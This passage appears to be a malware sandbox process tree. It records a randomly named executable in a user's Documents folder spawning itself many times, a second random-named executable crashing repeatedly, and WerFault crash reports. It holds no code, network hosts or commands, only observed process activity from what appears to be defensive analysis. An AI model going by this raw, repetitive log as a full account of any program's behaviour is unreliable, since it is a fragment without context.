    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15952
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16360
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10992
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13804
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15788
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12348
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15732
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10108
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15432
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12348
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12232
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9564
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5100
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10236
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16244
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7264
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8880
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3704
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15056
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6484
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14576
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7644
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16612
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16892
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17072
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17332
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14412
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16768
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3744
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16216
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4624
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16392
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14872
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16028
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:1056
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3312
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5996
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5336
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16476
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17504
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17708
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17932
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18108
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17296
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17328
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18080
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17236
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17432
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18248
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7572
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17740
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18184
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5636
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18340
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17544
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17444
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17736
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15484
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3192
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18708
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18908
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19408
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18508
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17568
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19196
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17616
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16736
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19300
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18680
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17580
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19056
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:676
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 19008 -s 24
      4⤵
      PID:18908
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19080
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19124
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19540
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19788
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20060
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20296
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19048
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19772
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20076
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19480
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20232
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18976
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19664
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17588
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20624
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20872
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21360
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10396
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:17624
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21344
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20136
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21408 -s 24
      4⤵
      PID:20468
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:180
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10076
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3140
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:16180
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19420
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21708
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20092
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21948
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22204
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18076
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21840
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22408
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4464
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22280
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12996
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:20208
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21324
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3572
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5900
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5948
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:956
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22008
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22720
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6400
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:23156
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22564
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22772 -s 24
      4⤵
      PID:23336
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:23420
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:19804
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22312
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11632
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18468
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21216
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22980
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8364
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7384
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:18504
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8760
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22580
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22580 -s 24
      4⤵
      PID:3980
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:21416
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:2956
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11664
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3336
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:22860
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:1604
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5148
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:23636
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:24084
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:24368
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:23192
- C:\Users\Admin\Documents\sz5SeOiGsIDNcMEK10AMbA5Z.exe
  "C:\Users\Admin\Documents\sz5SeOiGsIDNcMEK10AMbA5Z.exe"
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 660
    3⤵
    - Program crash
    PID:7340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 672
    3⤵
    - Program crash
    PID:7436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 680
    3⤵
    - Program crash
    PID:7740
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 896
    3⤵
    - Program crash
    PID:8396
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1128
    3⤵
    - Program crash
    PID:8696
- C:\Users\Admin\Documents\AMpO2NVoxbvK4SwkXf02e9LJ.exe
